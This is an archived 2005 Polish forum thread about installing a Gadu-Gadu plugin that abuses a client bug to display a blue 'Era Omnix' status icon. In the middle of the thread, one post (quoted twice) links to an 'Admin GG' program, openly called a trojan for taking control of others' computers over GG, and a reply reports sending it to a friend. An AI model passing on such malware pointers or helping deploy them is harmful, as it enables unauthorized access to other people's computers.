Pokaż pełną wersje : Niebieskie słoneczko w statusie GG
Tychanowicz
08-07-2005, 12:22
Witam. Od niedawna jest błąd w GG który pozwala na łączenie się niby przez Ere Omnix dzięki temu mamy niebieskie słoneczko w statusie GG. Chcesz mieć też ?
1.Ściagamy dodatek do GG http://www.ggcenter.net/plik-szczegoly-1338
2.Wyłączamy GG.
3.Instalujemy do folderu gdzie mamy GG ( np.C:\Program Files\Gadu-Gadu )
4.Zafajkowujemy przy instalacji plug-in Blue GG
http://img.photobucket.com/albums/v126/Boczekf/az0001.jpg
5.Uruchamiamy GG za pomocą Power Project*****
6.Zafajkowujemy Blue GG w PGGForever
http://img.photobucket.com/albums/v126/Boczekf/az0002.jpg
7.Uruchamiamy ponownie GG z Power Project***** i możemy się cieszyć z niebieskiego słoneczka.
UWAGI : Jeśli masz siebie samego na liście to nie zobaczysz swojego niebieskiego słoneczka. U Ciebie będzie wszystko normalnie wyglądało.
Ale u innych będzie takie coś.
http://img.photobucket.com/albums/v126/Boczekf/aaas.jpg
U mnie jest napisane, że nie można się połączyć...
Jaki może być tego powód?
Tychanowicz
08-07-2005, 12:29
Też to miałem ale już mi nie wyskakuje ten błąd, a nic nie robiłem. On w niczym nie przeszkadza.
Też to miałem ale już mi nie wyskakuje ten błąd, a nic nie robiłem. On w niczym nie przeszkadza.
A po czym poznam że jest niebieskie słoneczko?
Bo w statusach go nie mam...
Wielki MarIuSzzo
08-07-2005, 12:57
Zapytaj sie kogos z listy. Ja juz to sciagam, zobaczymy czy cos z tego wyjdzie.
EDIT: Dziala! :D
Wejdźcie w PGGForever i PGG-Config, zakładka AKTUALIZACJA i odznaczcie wszystko co tam jest :). Już nie powinno być błędu z brakiem połączenia. Wtyczka działa na 100% :]
Edit :
Orginalna strona : www.bluegg.yyy.pl
Ok już mi działa! Fajne ;)
Niebieskie słoneczko to pikuś, reszta wtyczek jest jeszcze lepsza. Pięknie dziękuje.
Teraz to juz ludzie skiny nawet na gg klada...eh...;)
ja testuje wersje nowa gg beta i samo mi te niebieskie słoneczko wskoczyło na jednego uzytkownika wystarczy ze masz wersje beta gg
A mi wyskakuje blad przy probie odpalenia gg! :p To znaczy blad windowsowy, po ktorym program od razu sie zamyka.
Jakoś uruchomić mi się power project***** nie chce :/ co jest nie tak?
dij_buhh
08-07-2005, 16:31
taki maly offtopic
allsoft4pc.com/hack/Admin%20GG[allsoft4pc.com]***** - tu (trzeba wkleić adres do przeglądarki, nie dalo sie zrobic linka na forum) jest taki maly programik (żeby nie powiedzieć trojan) który pozwala na przejęcie kontroli nad czyimś kompem przez gg, osobiście nie proobowalem bo nie koystaz z gg, ale u qmpla widzialem że dziala... w archiwum jest plik z opisem obslugi...
Serio? Niech no ktoś to sprawdzi. Nie umiem się włamywać itp. i nie chce mieć kłopotów z Policją :p
hehe fajne... Już kumplowi powiedziałem. Bajerancko wygląda. Już sie mnie ludzie pytają: A czemu masz niebieskie słoneczko??? :D
taki maly offtopic
allsoft4pc.com/hack/Admin%20GG[allsoft4pc.com]***** - tu (trzeba wkleić adres do przeglądarki, nie dalo sie zrobic linka na forum) jest taki maly programik (żeby nie powiedzieć trojan) który pozwala na przejęcie kontroli nad czyimś kompem przez gg, osobiście nie proobowalem bo nie koystaz z gg, ale u qmpla widzialem że dziala... w archiwum jest plik z opisem obslugi...
Zrobiłem wszystko tak jak tam było napisane i wysłałem program do kolegi, ale jemu wyskakuje ze nie ma uprawnien do uruchomienia tego pliku. Wiesz co trzeba zrobic?
Thimburd
09-07-2005, 14:53
A mi nie działa. Zrobiłem dokładnie tak jak kazałeś... i kumpel widzi czerwone/żółte lub jeszcze inne :|
Dobra, niebieskie słoneczko działa ;P
P.S. Ten program do hackowania... nie wierze...
Jedno ale. Na Twoim zdjeciu przed opisem był txt "Era Omnix". Czy po zainstalowaniu tego plug in przed każdym moim opisem będe miał wpisywane "Era Omnix" ? Taka reklama badziebna jak w sms'ach z bramek.
@up
Tak, każdy będzie widział przed Twoim opisem napis era omnix.
Ale ty prędki, mine friend mial to juz z 1~ tydzien temu ale dobra tam to zależy od umiejetnosci szukania *
* nie chce tutaj nikogo obrazic ;)
szkoda ze wygryto ten błąd i jush nie ma smerfów (słoneczek niebieskich:P)
szkoda ze wygryto ten błąd i jush nie ma smerfów (słoneczek niebieskich:P)
to znaczy że wytczka blue GG ju z nic nie daje?
to znaczy że wytczka blue GG ju z nic nie daje?
No przynajmniej na dzień dzisiejszy nic.
vBulletin® v3.7.0, Copyright ©2000-2025, Jelsoft Enterprises Ltd.